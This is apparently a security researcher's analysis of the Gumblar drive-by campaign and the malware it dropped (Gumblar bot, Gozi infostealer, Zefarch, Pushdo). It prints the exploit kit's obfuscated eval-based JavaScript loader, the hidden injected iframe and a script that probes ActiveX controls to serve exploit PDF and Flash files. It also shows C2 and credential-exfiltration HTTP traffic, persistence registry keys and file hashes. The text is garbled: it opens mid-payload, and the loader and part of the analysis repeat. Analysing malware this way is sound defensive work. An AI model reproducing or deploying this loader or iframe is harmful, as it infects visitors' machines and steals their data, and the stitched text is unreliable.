%0%j%N%B%U%T%S%Q%l%0%t%0%l%8%L%0%18%o%h%k%z%8%Z%D%14%1d%8%o%h%1%f%v%e%5%l%1%e%a%j%a%z%4%1%L%7%b%a%7%r%e%5%5%a%X%4%5%7%7%l%5%5%7%2%i%4%1%e%j%7%a%5%b%7%v%b%b%7%q%2%b%p%a%7%4%h%4%2%0%5%2%1l%7%1%4%5%k%4%a%8%5%5%L%7%8%a%4%7%9%1%4%1%7%0%a%7%e%2%B%4%a%p%2%l%7%b%4%e%h%4%b%9%7%5%4%p%4%m%5%2%4%r%5%b%7%5%17%a%b%2%f%r%9%8%j%m%i%o%8%1%n%b%3%6%e%3%6%2%3%6%4%3%6%1%3%5%3%6%7%3%a%n%k%s%F%0%f%f%2%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%d%c%g%I%d%c%g%g%k%E%0%1%j%N%B%U%T%S%Q%l%0%4%t%0%f%1f%4%1%p%5%1%14%e%1%1d%5%5%8%2%5%2%o%b%h%4%7%5%1k%5%b%e%f%r%9%8%j%m%i%o%8%1%n%6%7%3%a%3%6%e%3%6%2%3%6%4%3%b%3%6%1%3%5%n%k%s%F%0%f%f%2%2%0%9%8%h%J%9%l%u%d%c%g%K%d%c%d%c%g%j%N%B%U%T%S%Q%l%r%X%l%i%j%v%q%p%h%R%i%h%q%0%t%0%J%9%m%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%j%N%B%U%T%S%Q%l%r%B%p%O%j%9%8%v%v%8%C%R%i%h%q%0%t%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%4%2%e%9%4%e%5%p%4%a%1%5%s%a%1%9%7%a%i%4%e%O%2%2%0%2%4%5%10%4%k%e%1%m%2%1%8%b%b%a%v%2%1%2%f%r%9%8%j%m%i%o%8%1%n%b%3%6%2%3%a%3%6%e%3%6%1%3%6%7%3%5%3%6%4%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%2%b%J%4%h%5%5%7%m%4%e%p%2%b%p%4%Y%5%e%2%0%5%1c%a%V%b%j%1%4%7%9%7%8%5%5%v%7%b%v%e%4%a%f%r%9%8%j%m%i%o%8%1%n%6%4%3%b%3%5%3%6%e%3%6%2%3%a%3%6%1%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%L%e%7%i%2%1%14%4%7%r%4%5%8%7%a%e%1%V%b%a%8%2%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%5%3%b%3%6%4%3%a%3%6%1%3%6%2%n%k%s%F%0%f%f%2%u%d%c%g%g%j%N%B%U%T%S%Q%l%r%R%9%k%l%h%X%l%i%j%v%q%p%h%1%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%I%K%u%d%c%d%c%g%z%i%9%0%8%Y%Q%R%z%k%m%13%18%1e%0%t%0%v%8%h%19%l%h%8%9%z%i%m%1%E%J%l%o%h%k%p%l%1%2%I%k%E%0%1%j%N%B%U%T%S%Q%l%r%9%8%i%C%M%X%h%i%h%8%0%t%t%0%w%2%0%I%o%m%8%i%9%19%l%h%8%9%z%i%m%1%8%Y%Q%R%z%k%m%13%18%1e%2%u%L%k%l%C%p%L%r%m%p%o%i%h%k%p%l%0%t%0%f%m%1%C%b%i%1%1%1%1%j%1%W%b%4%2%n%a%7%1%a%a%n%2%7%a%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%6%1%3%6%2%3%a%3%b%3%5%3%6%4%n%k%s%F%0%f%f%2%u%K%K%F%0%1j%16%16%16%2%u%d%c%K%d%c%d%c%m%9%o%1a%O%M%N%1b%k%1%f%q%b%2%h%2%5%a%5%h%b%j%4%W%e%7%e%n%2%e%2%n%1%e%m%a%7%k%1%h%4%b%8%7%q%1%k%2%2%h%2%5%v%5%1%o%2%5%4%b%4%i%5%9%7%1%7%r%b%o%1%7%1%l%e%1%n%4%4%m%b%e%p%7%b%7%i%b%7%4%4%e%C%b%r%7%7%j%4%5%4%q%1%b%j%2%a%b%5%2%1n%5%2%1%5%k%e%e%7%C%2%b%a%t%5%17%4%1%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%1%3%a%3%b%3%6%2%3%6%4%3%5%3%6%e%n%k%s%F%0%f%f%2%2%u\'));',62,86,'u0020|u0028|u0029|u007c|u0021|u0026|u005c|u005e|u0065|u0072|u0040|u0023|u000a|u000d|u0024|u0027|u0009|u0074|u0061|u0070|u0069|u006e|u006c|u002f|u0063|u006f|u0068|u002e|u0067|u003d|u003b|u0073|u0034|u0022|u002b|u0076|u0035|u0043|u0064|u004f|u0066|u002c|u0052|u0051|u007b|u0075|u007d|u0077|u0079|u004a|u006d|u0048|u004e|u0050|u004c|u0042|u0059|u0078|u003a|u0053|u006b|u0058|u0046|u004b|u0057|u0036|u0062|u0032|u0030|u0031|u0041|u0049|u0037|u0044|u0045|u006a|u0055|u005b|u003c|eval|unescape|u0033|u005d|u0056|u0039|u003f'.split('|')))</script><html>
<body>
<script>
function pdfswf()
{
.PDF = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
.for(i in PDF)
.{
..try
..{
...obj = new ActiveXObject(PDF[i]);
...if (obj)
...{
....document.write('<iframe src="cache/readme.pdf"></iframe>');
...}
..}
..catch(e){}
.}
.try
.{
..obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
..if (obj)
..{
...document.write('<iframe src="cache/flash.swf"></iframe>');
..}
.}
.catch(e){}
}
pdfswf();
</script>
Malware Analysis
http://litehitscar.cn/load.php?id=5 (load.exe)
The request for load.php returns the binary file load.exe.
File: load.exe
Size: 18432
MD5: 4C328C15F6E8603F713FDACF7DAC6E87
The malware dropper load.exe creates C:\WINDOWS\system32\digiwet.dll and modifies a registry key to launch the malware at startup.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders "SecurityProviders"
Old type: REG_SZ
New type: REG_SZ
Old data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll
New data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll
The digiwet.dll malware is the core “Gumblar” bot. The malware initiates connections to the bot controller at 78.109.29.112 (Ukraine) and downloads 259043 bytes of data which includes additional malware. Additional C2 connections to 78.109.30.224 (Ukraine) were observed.
GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633 HTTP/1.1
Host: 78.109.29.112
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 Apr 2009 00:06:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Version: 1
Content-Length: 259043
Entity-Info: 1239013921:32768:1;1239013932:41984:1;1239013964:84480:2;1239022982:33792:2;1239024633:45568:2;1239875139:20451:2;
Rnd: 982306
Magic-Number: 256|1|40:21:222:188:141:149:35:113:122:238:96:131:88:202:90:82:137:127:146:127:209:5:235:94:57:25:53:42:127:239:54:168:4:21:100:145:170:136:3:37:118:100:168:206:47:2:33:184:129:179:55:83:185:35:177:242:60:231:29:188:214:84:100:218:105:201:108:19:81:112:57:199:212:225:150:3:228:183:188:102:107:243:186:36:23:108:23:83:83:52:16:41:136:116:4:241:62:112:5:143:225:62:87:182:32:238:186:5:166:118:107:17:106:38:54:129:146:77:213:229:129:229:14:10:90:19:251:152:132:1:40:101:64:128:27:97:111:213:102:21:75:210:39:181:248:93:55:138:170:12:112:44:242:127:54:77:146:50:229:22:51:14:123:115:143:151:213:254:108:59:20:184:14:59:110:6:152:165:145:67:178:1:111:164:128:165:241:19:215:215:41:11:230:164:126:117:60:84:116:168:143:136:97:157:195:207:164:92:117:54:159:39:55:14:204:184:180:189:203:139:149:245:150:124:154:21:241:214:105:102:127:249:238:224:151:178:176:59:14:37:113:173:77:169:187:25:98:112:215:46:251:108:35:146:233:189:
eON...#q~.`..5ZR1......^y.5*..6...d....%vd../.!...7S.#..
************************************************************************
GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1239022982:unique_start;1239024633:unique_start;1239875139:unique_start HTTP/1.1
Host: 78.109.29.112
************************************************************************
POST /good/receiver/online HTTP/1.1
Host: 78.109.30.224
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
guid=397089404
************************************************************************
The downloaded data creates 4 temp files:
C:\WINDOWS\Temp\wpv451239013964.exe
C:\WINDOWS\Temp\wpv211239022982.exe
C:\WINDOWS\Temp\wpv781239024633.exe
C:\WINDOWS\Temp\wpv941239875139.exe
wpv451239013964.exe (Downloader)
The Temp file wpv451239013964.exe creates a trojan downloader. The malware creates:
C:\WINDOWS\system32\crypts.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Asynchronous"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "DLLName"
Type: REG_SZ
Data: crypts.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Impersonate"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "StartShell"
Type: REG_SZ
Data: Run
The malware connects to af9f440dcc.com (83.133.127.5, Germany) to receive instructions for additional malware downloads. The below connection returns instructions to download malware from spaeioer.com (68.180.151.74, US)
GET /bt.php?mod=&id=computername_-324073247&up=2667859&mid=soboc43 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: af9f440dcc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Transfer-Encoding: chunked
X-Powered-By: PHP/5.2.6
Content-type: text/html
Date: Fri, 17 Apr 2009 00:42:08 GMT
Server: lighttpd/1.4.19
0SLP:3600;MOD:dAjvlbv5;URL:http://spaeioer.com/741l3.exe;SRV:stoped;
************************************************************************
GET /741l3.exe HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: spaeioer.com
Connection: Keep-Alive
************************************************************************
wpv211239022982.exe (Gozi)
The Temp file wpv211239022982.exe creates a Gozi variant. The malware monitors web connections and serves as an infostealer. The Temp file wpv211239022982.exe creates:
C:\WINDOWS\9129837.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ttool = "%Windir%\9129837.exe"
The file 9129837.exe creates:
C:\WINDOWS\new_drv.sys
HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Type: REG_BINARY
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Type: REG_DWORD
Data: 15, AB, 0A, 85
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Type: REG_DWORD
Data: 91, CC, B1, 44
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 16
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"
Type: REG_BINARY
Data: [binary data]
The following services are stopped:
Application Layer Gateway Service
Windows Firewall/Internet Connection Sharing (ICS)
Security Center
The Gozi malware connects to 91.207.61.44 (Ukraine) and 212.117.165.54 (Luxembourg) for C2 and data exfiltration.
POST /cgi-bin/ppp.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28c6e728c6e728c6e7
User-Agent: IE
Host: 91.207.61.44
Content-Length: 231
Cache-Control: no-cache
----------------------------28c6e728c6e728c6e7
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
Forms:
----------------------------28c6e728c6e728c6e7--
************************************************************************
GET /cgi-bin/commm.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44
************************************************************************
GET /cgi-bin/ooo.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44
************************************************************************
POST /cgi-bin/ccc.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28cd6f28cd6f28cd6f
User-Agent: IE
Host: 91.207.61.44
Content-Length: 305
Cache-Control: no-cache
----------------------------28cd6f28cd6f28cd6f
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
0S...0...*.H.. .......0.0;0.0...+........z(W...g*{....5&.............*...Z...18m.....
----------------------------28cd6f28cd6f28cd6f—
************************************************************************
POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28ea2e28ea2e28ea2e
User-Agent: IE
Host: 91.207.61.44
Content-Length: 263
Cache-Control: no-cache
----------------------------28ea2e28ea2e28ea2e
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
URL: https://212.117.165.54/put.php
load=1
----------------------------28ea2e28ea2e28ea2e--
************************************************************************
POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------297799297799297799
User-Agent: IE
Host: 91.207.61.44
Content-Length: 3494
Cache-Control: no-cache
----------------------------297799297799297799
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
URL: https://212.117.165.54/put.php
type=jpg&img=/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAwANoDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb
************************************************************************
POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------2a3ea22a3ea22a3ea2
User-Agent: IE
Host: 91.207.61.44
Content-Length: 266
Cache-Control: no-cache
----------------------------2a3ea22a3ea22a3ea2
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
URL: https://212.117.165.54/put.php
confirm=1
----------------------------2a3ea22a3ea22a3ea2—
************************************************************************
wpv781239024633.exe (Zefarch)
The Temp file wpv781239024633.exe creates a Trojan. Zefarch variant. The malware monitors connections to various search engines and redirects search results to adware and malicious websites. The Temp file wpv781239024633.exe creates:
C:\WINDOWS\psbdxt.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Wjite"
Type: REG_BINARY
Data: 43, 01, 38, 03, 58, 05, 51, 07, 41, 09, 44, 0B, 48, 0D, 41, 0F, 47, 11, 41, 13, 48, 15, 66, 17, 6B, 19, 78, 1B, 78, 1D, 66, 1F, 54, 21, 0C, 23, 40, 25, 4A, 27, 44, 29, 2A, 2B
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Xlaheko"
Type: REG_SZ
Data: 61
wpv941239875139.exe (Pushdo)
The Temp file wpv941239875139.exe creates a Pushdo/Pandex/Cutwail variant. The malware serves as a spambot. The Temp file wpv941239875139.exe creates a file in the user profile directory with the same name as the actual profile name. In this example john.exe was created.
Creates:
C:\Documents and Settings\John\John.exe
A registry key is created to launch the malware at startup
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "John"
Type: REG_SZ
Data: C:\Documents and Settings\John\John.exe /i
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "John"
Type: REG_SZ
Data: C:\Documents and Settings\John\John.exe /i
The malware connected to 94.247.2.95 (Latvia) for C2.
GET /40E8001430303030303030303030303030303030303031306C0000009666000000007600000642EB00053059707A82 HTTP/1.0
Content-Type: application/octet-stream
Filename Size MD5
741l3.exe 72704 03aaccd01330f844d6c601df997fc1ff
9129837.exe 33792 096ffe693647f1ad8b2e86a8b7f05b44
crypts.dll 33280 1e6d7d0dcb2afcbf20b676f0992057bb
digiwet.dll 18432 3a1d598473469887fd0ed651b7ca96b8
flash.swf 16588 609d207cf010cbda0fcde027301cbd0e
John.exe 20451 eda1b7d3cdb3fb1a1c4e4ba2b51b46a7
load.exe 18432 4c328c15f6e8603f713fdacf7dac6e87
new_drv.sys 8192 a54de1d46ff7bdefbf9d9284c1916c5e
psbdxt.dll 45568 e075c7258f38b6581277552db80659f3
readme.pdf 15964 3e8da97b9f4da49498dfa31ae1c5c342
wpv451239013964.exe 84480 29d9286c42074702a96d94138a092450
wpv781239024633.exe 45568 27a9a6570b53d3dc1e9a24317f6f6fa6
- The bad guys use stolen FTP credentials or SQL injection to inject iframe redirects into legitimate websites.
- The iframes redirect to sites that host exploit code targteted against web browsers, browser plug-ins and 3rd party applications (IE, FF, Adobe Reader, WinZip, etc.)
- The exploits result in malware payload. The malware typically downloads additional for-profit malware (spambots, infostealers, rogue security products, etc.)
- Credentials exfiltrated by infostealers (like FTP) are used to compromise additional web servers back in step #1.
Gumbar Exploit Analysis
The USDA Forest Service website (http://www.fs.fed.us) was a vicitm of an iframe injection. The compromised site contained an iframe to lotmachinesguide.cn (94.247.3.150, Latvia).
<iframe src="http://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
The lotmachinesguide.cn/in.cgi?income56 request returned a HTTP Location redirect to liteautogreatest.cn (94.247.3.151, Latvia). The http://liteautogreatest.cn/index.php request returned obfuscated JavaScript and references to Adobe Reader and Flash files that contain exploit code.
http://liteautogreatest.cn/cache/readme.pdf
http://liteautogreatest.cn/cache/flash.swf
The first 2 sections of exploit code target the Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041). The readme.pdf file contains code designed to exploit the Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19) and a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript Engine (CVE-2007-5659, APSB08-13). The flash.swf file exploits an Adobe Flash vulnerability (not sure specific one).The exploit payloads were GET requests to litehitscar.cn (94.247.3.151, Latvia) that returned load.exe.
http://litehitscar.cn/load.php?id=1
http://litehitscar.cn/load.php?id=4
http://litehitscar.cn/load.php?id=5
http://liteautogreatest.cn/index.php Code
<script>eval(function(l,a,z,k,e,d){e=function(z){return(z<a?'':e(parseInt(z/a)))+((z=z%a)>35?String.fromCharCode(z+29):z.toString(36))};while(z--){if(k[z]){l=l.replace(new RegExp('\\b'+e(z)+'\\b','g'),k[z])}}return l}('1h(1i(\'%E%J%l%o%h%k%p%l%0%V%l%E%10%h%L%B%E%w%1%2%d%c%I%d%c%g%E%p%9%1%j%P%D%9%11%j%M%P%w%0%t%0%15%F%0%z%q%s%A%A%G%w%D%H%0%t%0%x%x%u%0%j%P%D%9%11%j%M%P%w%0%1g%t%0%15%13%u%0%j%P%D%9%11%j%M%P%w%y%y%2%d%c%g%I%d%c%g%g%z%q%s%A%A%G%w%D%H%0%t%0%X%h%9%k%l%s%r%E%9%p%O%B%q%i%9%B%p%C%8%1%13%A%0%y%0%j%P%D%9%11%j%M%P%w%2%u%d%c%g%g%z%i%9%0%C%H%w%B%12%G%q%C%Z%0%t%0%l%8%L%0%19%O%i%s%8%1%2%u%d%c%g%g%C%H%w%B%12%G%q%C%Z%r%v%9%o%0%t%0%x%9%8%v%W%n%n%x%0%y%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%a%7%1%2%9%1%e%p%2%e%s%5%9%1%a%i%7%O%e%4%0%2%10%b%k%4%m%e%a%2%8%1%v%b%e%e%f%r%9%8%j%m%i%o%8%1%n%5%3%a%3%b%3%6%4%3%6%7%3%6%2%3%6%e%3%6%1%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%7%J%1%4%a%h%e%7%m%2%1%a%p%1%p%a%a%a%Y%a%2%0%7%5%a%1c%a%1%5%4%V%4%a%j%7%4%9%4%5%8%a%1%v%2%7%v%5%4%f%r%9%8%j%m%i%o%8%1%n%a%3%b%3%5%3%6%7%3%6%1%3%6%4%3%6%e%3%6%2%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%O%5%2%v%e%p%2%8%a%7%1%9%1%8%2%e%4%v%5%b%7%5%r%2%b%b%b%C%b%5%4%b%m%4%e%5%m%1%4%f%r%9%8%j%m%i%o%8%1%n%b%3%6%4%3%6%e%3%6%1%3%a%3%6%2%3%5%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%n%b%15%n%17%x%u%d%c%d%c%g%g%k%E%1%C%H%w%B%12%G%q%C%Z%r%q%8%k%s%q%h%0%t%t%0%A%1m%2%d%c%g%g%I%d%c%g%g%g%14%9%8%i%Y%u%d%c%g%g%K%d%c%d%c%g%g%C%H%w%B%12%G%q%C%Z%0%t%0%f%f%u%d%c%g%K%d%c%d%c%g%9%8%h%J%9%l%0%z%q%s%A%A%G%w%D%H%u%d%c%K%d%c%d%c%E%J%l%o%h%k%p%l%0%m%9%o%1a%O%M%N%1b%k%1%J%9%m%2%d%c%I%d%c%g%z%i%9%0%z%q%s%A%A%G%w%D%H%0%t%0%V%l%E%10%h%L%B%E%w%1%2%u%d%c%g%k%E%0%1%z%q%s%A%A%G%w%D%H%0%t%t%0%f%1f%f%2%0%9%8%h%J%9%l%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%z%i%9%0%j%N%B%U%T%S%Q%l%0%t%0%l%8%L%0%18%o%h%k%z%8%Z%D%14%1d%8%o%h%1%f%v%e%5%l%1%e%a%j%a%z%4%1%L%7%b%a%7%r%e%5%5%a%X%4%5%7%7%l%5%5%7%2%i%4%1%e%j%7%a%5%b%7%v%b%b%7%q%2%b%p%a%7%4%h%4%2%0%5%2%1l%7%1%4%5%k%4%a%8%5%5%L%7%8%a%4%7%9%1%4%1%7%0%a%7%e%2%B%4%a%p%2%l%7%b%4%e%h%4%b%9%7%5%4%p%4%m%5%2%4%r%5%b%7%5%17%a%b%2%f%r%9%8%j%m%i%o%8%1%n%b%3%6%e%3%6%2%3%6%4%3%6%1%3%5%3%6%7%3%a%n%k%s%F%0%f%f%2%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%d%c%g%I%d%c%g%g%k%E%0%1%j%N%B%U%T%S%Q%l%0%4%t%0%f%1f%4%1%p%5%1%14%e%1%1d%5%5%8%2%5%2%o%b%h%4%7%5%1k%5%b%e%f%r%9%8%j%m%i%o%8%1%n%6%7%3%a%3%6%e%3%6%2%3%6%4%3%b%3%6%1%3%5%n%k%s%F%0%f%f%2%2%0%9%8%h%J%9%l%u%d%c%g%K%d%c%d%c%g%j%N%B%U%T%S%Q%l%r%X%l%i%j%v%q%p%h%R%i%h%q%0%t%0%J%9%m%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%j%N%B%U%T%S%Q%l%r%B%p%O%j%9%8%v%v%8%C%R%i%h%q%0%t%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%4%2%e%9%4%e%5%p%4%a%1%5%s%a%1%9%7%a%i%4%e%O%2%2%0%2%4%5%10%4%k%e%1%m%2%1%8%b%b%a%v%2%1%2%f%r%9%8%j%m%i%o%8%1%n%b%3%6%2%3%a%3%6%e%3%6%1%3%6%7%3%5%3%6%4%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%2%b%J%4%h%5%5%7%m%4%e%p%2%b%p%4%Y%5%e%2%0%5%1c%a%V%b%j%1%4%7%9%7%8%5%5%v%7%b%v%e%4%a%f%r%9%8%j%m%i%o%8%1%n%6%4%3%b%3%5%3%6%e%3%6%2%3%a%3%6%1%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%L%e%7%i%2%1%14%4%7%r%4%5%8%7%a%e%1%V%b%a%8%2%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%5%3%b%3%6%4%3%a%3%6%1%3%6%2%n%k%s%F%0%f%f%2%u%d%c%g%g%j%N%B%U%T%S%Q%l%r%R%9%k%l%h%X%l%i%j%v%q%p%h%1%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%I%K%u%d%c%d%c%g%z%i%9%0%8%Y%Q%R%z%k%m%13%18%1e%0%t%0%v%8%h%19%l%h%8%9%z%i%m%1%E%J%l%o%h%k%p%l%1%2%I%k%E%0%1%j%N%B%U%T%S%Q%l%r%9%8%i%C%M%X%h%i%h%8%0%t%t%0%w%2%0%I%o%m%8%i%9%19%l%h%8%9%z%i%m%1%8%Y%Q%R%z%k%m%13%18%1e%2%u%L%k%l%C%p%L%r%m%p%o%i%h%k%p%l%0%t%0%f%m%1%C%b%i%1%1%1%1%j%1%W%b%4%2%n%a%7%1%a%a%n%2%7%a%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%6%1%3%6%2%3%a%3%b%3%5%3%6%4%n%k%s%F%0%f%f%2%u%K%K%F%0%1j%16%16%16%2%u%d%c%K%d%c%d%c%m%9%o%1a%O%M%N%1b%k%1%f%q%b%2%h%2%5%a%5%h%b%j%4%W%e%7%e%n%2%e%2%n%1%e%m%a%7%k%1%h%4%b%8%7%q%1%k%2%2%h%2%5%v%5%1%o%2%5%4%b%4%i%5%9%7%1%7%r%b%o%1%7%1%l%e%1%n%4%4%m%b%e%p%7%b%7%i%b%7%4%4%e%C%b%r%7%7%j%4%5%4%q%1%b%j%2%a%b%5%2%1n%5%2%1%5%k%e%e%7%C%2%b%a%t%5%17%4%1%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%1%3%a%3%b%3%6%2%3%6%4%3%5%3%6%e%n%k%s%F%0%f%f%2%2%u\'));',62,86,'u0020|u0028|u0029|u007c|u0021|u0026|u005c|u005e|u0065|u0072|u0040|u0023|u000a|u000d|u0024|u0027|u0009|u0074|u0061|u0070|u0069|u006e|u006c|u002f|u0063|u006f|u0068|u002e|u0067|u003d|u003b|u0073|u0034|u0022|u002b|u0076|u0035|u0043|u0064|u004f|u0066|u002c|u0052|u0051|u007b|u0075|u007d|u0077|u0079|u004a|u006d|u0048|u004e|u0050|u004c|u0042|u0059|u0078|u003a|u0053|u006b|u0058|u0046|u004b|u0057|u0036|u0062|u0032|u0030|u0031|u0041|u0049|u0037|u0044|u0045|u006a|u0055|u005b|u003c|eval|unescape|u0033|u005d|u0056|u0039|u003f'.split('|')))</script><html>
<body>
<script>
function pdfswf()
{
.PDF = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
.for(i in PDF)
.{
..try
..{
...obj = new ActiveXObject(PDF[i]);
...if (obj)
...{
....document.write('<iframe src="cache/readme.pdf"></iframe>');
...}
..}
..catch(e){}
.}
.try
.{
..obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
..if (obj)
..{
...document.write('<iframe src="cache/flash.swf"></iframe>');
..}
.}
.catch(e){}
}
pdfswf();
</script>
Malware Analysis
http://litehitscar.cn/load.php?id=5 (load.exe)
The request for load.php returns the binary file load.exe.
File: load.exe
Size: 18432
MD5: 4C328C15F6E8603F713FDACF7DAC6E87
The malware dropper load.exe creates C:\WINDOWS\system32\digiwet.dll and modifies a registry key to launch the malware at startup.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders "SecurityProviders"
Old type: REG_SZ
New type: REG_SZ
Old data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll
